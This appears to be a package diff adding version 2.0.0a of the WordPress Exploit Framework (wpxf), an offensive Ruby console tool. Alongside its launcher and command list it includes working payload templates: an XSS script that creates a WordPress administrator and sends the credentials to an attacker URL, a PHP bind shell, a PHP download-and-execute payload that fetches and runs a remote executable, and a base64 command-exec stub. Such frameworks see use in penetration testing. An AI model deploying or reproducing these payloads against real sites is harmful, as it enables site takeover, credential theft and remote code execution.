wpxf 2.0.0a

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 88cc61a49c99dadfe784503e10bb8850a9fa9783c86ca951aad98fe86878ea51
+  data.tar.gz: 4e3b3df123398881ea918dfc2a7f6c2a2279cb632ca9879eecbdf7f13c96c5b7
+SHA512:
+  metadata.gz: '000349eeaceaf3bd40b0b23861e8fd7ae5c231cda8fd079739d253abcd8e28a492d0e3915b1393b57ed6d498cb23095165d911763ed713b4b5c7b18cfe362fa9'
+  data.tar.gz: 4157996c7c90b62994c9a0186f198bd7efbf4584245a600a928c8896c875a1f14d4c61bca0d7450c2ddff645e19bbe6a0a5e87336a43b08ed23fb9711b25634e

data/bin/wpxf

@@ -0,0 +1,52 @@
+#!/usr/bin/env ruby
+# frozen_string_literal: true
+
+require 'wpxf'
+require 'wpxf/cli/console'
+require 'wpxf/cli/banner'
+
+begin
+  Slop.parse do |o|
+    o.on '--version', 'print the version' do
+      puts Wpxf.version
+      exit
+    end
+  end
+rescue Slop::UnknownOption => e
+  puts e.message
+  exit
+end
+
+console = Wpxf::Cli::Console.new
+console.check_cache
+console.clear
+
+banner = Wpxf::Cli::Banner.new
+banner.display
+
+Dir.chdir(Dir.tmpdir) do
+  temp_directories = Dir.glob('wpxf_*')
+  unless temp_directories.empty?
+    print '[!] '.yellow
+    puts "#{temp_directories.length} temporary files were found that "\
+         'appear to no longer be needed.'
+    print '    Would you like to remove these files? [y/n]: '
+    temp_directories.each { |d| FileUtils.rm_r(d) } if gets.chomp =~ /^y$/i
+    puts
+  end
+end
+
+found_env_var = false
+ENV.each do |name, value|
+  next if name.casecmp('wpxf_env').zero?
+  match = name.match(/^wpxf_(.+)/i)
+
+  if match
+    console.gset match.captures[0], value
+    found_env_var = true
+  end
+end
+
+puts if found_env_var
+console.start
+console.clear

data/data/banners/default.txt

@@ -0,0 +1,16 @@
+
+{YB}                      /\
+{YB}          _.--''-- , / /
+{YB}  ,---- .'          /_/
+{YB}   '---',  .  _  .    ;
+{YB}        ._  __ __      \
+{YB}       , _)        .-'  y      {WB}WordPress Exploit Framework
+{YB}       -          (_..   :     {WN}Version {VERSION}
+{YB}      ; ...  ... (\     \ '
+{YB}      _  \ \ \ \  /      ; :   {WB}Auxiliaries: {GN}{AUXILIARY_COUNT}
+{YB}     ( t  \ \/\ \/  _   '  l   {WB}Exploits:    {GN}{EXPLOIT_COUNT}
+{YB}     \ |   \/  \/  i )- ' /    {WB}Payloads:    {GN}{PAYLOAD_COUNT}
+{YB}      - '._        | /  ,'
+{YB}       ..   ' - ''  -j ,
+{YB}      (  '.___.. --'.
+{YB}       '.______..--'

data/data/js/ajax_download.js

@@ -0,0 +1,33 @@
+function ajax_download(oArg) {
+  if (!oArg.method) { oArg.method = "GET"; }
+  if (!oArg.path)   { throw "Missing parameter 'path'"; }
+  if (!oArg.data)   { oArg.data = null; }
+
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open(oArg.method, oArg.path, !!oArg.cb);
+
+  if (oArg.cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) {
+        oArg.cb.apply(this);
+      }
+    };
+
+    xmlHttp.send(oArg.data);
+  }
+  else {
+    xmlHttp.send(oArg.data);
+    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+      return xmlHttp.responseText;
+    }
+
+    return null;
+  }
+
+  return xmlHttp;
+}

data/data/js/ajax_post.js

@@ -0,0 +1,18 @@
+function postInfo(path, data, cb) {
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open('POST', path, !!cb);
+
+  if (cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
+    };
+  }
+
+  xmlHttp.send(data);
+  return xmlHttp;
+}

data/data/js/create_wp_user.js

@@ -0,0 +1,24 @@
+var create_user = function () {
+  var nonce = this.responseText.match(/id="_wpnonce_create-user" name="_wpnonce_create-user" value="([a-z0-9]+)"/i)[1];
+  var data = new FormData();
+
+  data.append('action', 'createuser');
+  data.append('_wpnonce_create-user', nonce);
+  data.append('_wp_http_referer', '$wordpress_url_new_user');
+  data.append('user_login', '$username');
+  data.append('email', '$email');
+  data.append('pass1', '$password');
+  data.append('pass2', '$password');
+  data.append('role', 'administrator');
+
+  postInfo("$wordpress_url_new_user", data, function () {
+    var a = document.createElement("script");
+    a.setAttribute("src", "$xss_url?u=$username&p=$password");
+    document.head.appendChild(a);
+  });
+};
+
+ajax_download({
+  path: "$wordpress_url_new_user",
+  cb: create_user
+});

data/data/js/post.js

@@ -0,0 +1,20 @@
+function post(path, params, method) {
+  method = method || "post";
+  var form = document.createElement("form");
+  form.setAttribute("method", method);
+  form.setAttribute("action", path);
+
+  for(var key in params) {
+    if(params.hasOwnProperty(key)) {
+      var hiddenField = document.createElement("input");
+      hiddenField.setAttribute("type", "hidden");
+      hiddenField.setAttribute("name", key);
+      hiddenField.setAttribute("value", params[key]);
+
+      form.appendChild(hiddenField);
+     }
+  }
+
+  document.body.appendChild(form);
+  form.submit();
+}

data/data/json/browser_usage_by_frequency.json

@@ -0,0 +1,64 @@
+{
+  "34": {
+    "89": {
+      "browser": "chrome",
+      "os": "windows"
+    },
+    "9": {
+      "browser": "chrome",
+      "os": "osx"
+    },
+    "2": {
+      "browser": "chrome",
+      "os": "linux"
+    }
+  },
+  "32": {
+    "100": {
+      "browser": "iexplorer",
+      "os": "windows"
+    }
+  },
+  "25": {
+    "83": {
+      "browser": "firefox",
+      "os": "windows"
+    },
+    "16": {
+      "browser": "firefox",
+      "os": "osx"
+    },
+    "1": {
+      "browser": "firefox",
+      "os": "linux"
+    }
+  },
+  "7": {
+    "95": {
+      "browser": "safari",
+      "os": "osx"
+    },
+    "4": {
+      "browser": "safari",
+      "os": "windows"
+    },
+    "1": {
+      "browser": "safari",
+      "os": "linux"
+    }
+  },
+  "2": {
+    "91": {
+      "browser": "opera",
+      "os": "windows"
+    },
+    "6": {
+      "browser": "opera",
+      "os": "linux"
+    },
+    "3": {
+      "browser": "opera",
+      "os": "osx"
+    }
+  }
+}

data/data/json/commands.json

@@ -0,0 +1,116 @@
+{
+  "data": [
+    {
+      "cmd": "back",
+      "desc": "Change the context of the session back to it was before loading the current module."
+    },
+    {
+      "cmd": "check",
+      "desc": "Check if the currently loaded module can be used against the specified target."
+    },
+    {
+      "cmd": "clear",
+      "desc": "Clear the screen."
+    },
+    {
+      "cmd": "creds",
+      "desc": "List the credentials stored in the current workspace."
+    },
+    {
+      "cmd": "creds -d [id]",
+      "desc": "Delete the credential with the matching [id] number."
+    },
+    {
+      "cmd": "exit",
+      "desc": "Exit the WordPress Exploit Framework prompt."
+    },
+    {
+      "cmd": "gset [option] [value]",
+      "desc": "Set the [value] of [option] globally, so it is used by the current and future modules."
+    },
+    {
+      "cmd": "gunset [option]",
+      "desc": "Unset a global [option] set with the gset command."
+    },
+    {
+      "cmd": "help",
+      "desc": "Shows this information."
+    },
+    {
+      "cmd": "info",
+      "desc": "Display information about the currently loaded module."
+    },
+    {
+      "cmd": "loot",
+      "desc": "List the loot collected from targets in the current workspace."
+    },
+    {
+      "cmd": "loot -d [id]",
+      "desc": "Delete the loot item with the matching [id] number."
+    },
+    {
+      "cmd": "loot -p [id]",
+      "desc": "Print the content of the loot item with the matching [id] number."
+    },
+    {
+      "cmd": "quit",
+      "desc": "Exit the WordPress Exploit Framework prompt."
+    },
+    {
+      "cmd": "rebuild_cache",
+      "desc": "Re-build the module cache."
+    },
+    {
+      "cmd": "run",
+      "desc": "Run the currently loaded module."
+    },
+    {
+      "cmd": "set [option] [value]",
+      "desc": "Set the [value] of [option] for the currently loaded module."
+    },
+    {
+      "cmd": "search [keywords]",
+      "desc": "Search for modules that contain one or more of the specified [keywords]"
+    },
+    {
+      "cmd": "show advanced",
+      "desc": "Show the advanced options of the currently loaded module."
+    },
+    {
+      "cmd": "show auxiliary",
+      "desc": "Show the list of available auxiliary modules."
+    },
+    {
+      "cmd": "show exploits",
+      "desc": "Show the list of available exploits."
+    },
+    {
+      "cmd": "show options",
+      "desc": "Show the basic options of the currently loaded module."
+    },
+    {
+      "cmd": "unset [option]",
+      "desc": "Unset an [option] set with the set command."
+    },
+    {
+      "cmd": "use [module_path]",
+      "desc": "Loads the specified module into the current context."
+    },
+    {
+      "cmd": "workspace",
+      "desc": "List the available workspaces."
+    },
+    {
+      "cmd": "workspace [name]",
+      "desc": "Switch to the [name] workspace."
+    },
+    {
+      "cmd": "workspace -a [name]",
+      "desc": "Add a new workspace."
+    },
+    {
+      "cmd": "workspace -d [name]",
+      "desc": "Delete the [name] workspace."
+    }
+  ]
+}

data/data/php/bind_php.php

@@ -0,0 +1,43 @@
+<?php
+  $scl = 'socket_create_listen';
+  if (is_callable($scl) && !in_array($scl, $wpxf_disabled)) {
+    $sock = @$scl($port);
+  }
+  else {
+    $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+    $ret = @socket_bind($sock, 0, $port);
+    $ret = @socket_listen($sock, 5);
+  }
+
+  $msg_sock=@socket_accept($sock);
+  @socket_close($sock);
+
+  $output = getcwd().' > ';
+  @socket_write($msg_sock, $output, strlen($output));
+
+  while (FALSE !== @socket_select($r = array($msg_sock), $w = NULL, $e = NULL, NULL)) {
+    $output = '';
+    $cmd = @socket_read($msg_sock, 2048, PHP_NORMAL_READ);
+
+    if (FALSE === $cmd) { break; }
+    if (substr($cmd, 0, 3) == 'cd ') {
+      chdir(substr($cmd, 3, -1));
+      $output = getcwd().' > ';
+    }
+    else if (substr($cmd, 0, 4) == 'quit' || substr($cmd, 0, 4) == 'exit') {
+      break;
+    }
+    else {
+      if (false === strpos(strtolower(PHP_OS), 'win')) {
+        $cmd = rtrim($cmd).' 2>&1';
+      }
+
+      $output = $wpxf_exec($cmd);
+      $output .= getcwd().' > ';
+    }
+
+    @socket_write($msg_sock, $output, strlen($output));
+  }
+  
+  @socket_close($msg_sock);
+?>

data/data/php/download_exec.php

@@ -0,0 +1,36 @@
+<?php
+  if (!function_exists('sys_get_temp_dir')) {
+    function sys_get_temp_dir() {
+      if (!empty(getenv('TMP'))) { return realpath(getenv('TMP')); }
+      if (!empty(getenv('TMPDIR'))) { return realpath(getenv('TMPDIR')); }
+      if (!empty(getenv('TEMP'))) { return realpath(getenv('TEMP')); }
+
+      $tempfile = tempnam(uniqid(rand(), TRUE),'');
+
+      if (file_exists($tempfile)) {
+        @unlink($tempfile);
+        return realpath(dirname($tempfile));
+      }
+
+      return null;
+    }
+  }
+
+  $fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $exename;
+  $fd_in = fopen($executable_url, "rb");
+  $fd_out = fopen($fname, "wb");
+
+  while (!feof($fd_in)) {
+    fwrite($fd_out, fread($fd_in, 8192));
+  }
+
+  fclose($fd_in);
+  fclose($fd_out);
+  chmod($fname, 0777);
+
+  $cmd = $fname;
+  $output = $wpxf_exec($cmd);
+
+  @unlink($fname);
+  echo $output;
+?>

data/data/php/exec.php

@@ -0,0 +1,3 @@
+<?php
+  echo $wpxf_exec(base64_decode($cmd));
+?>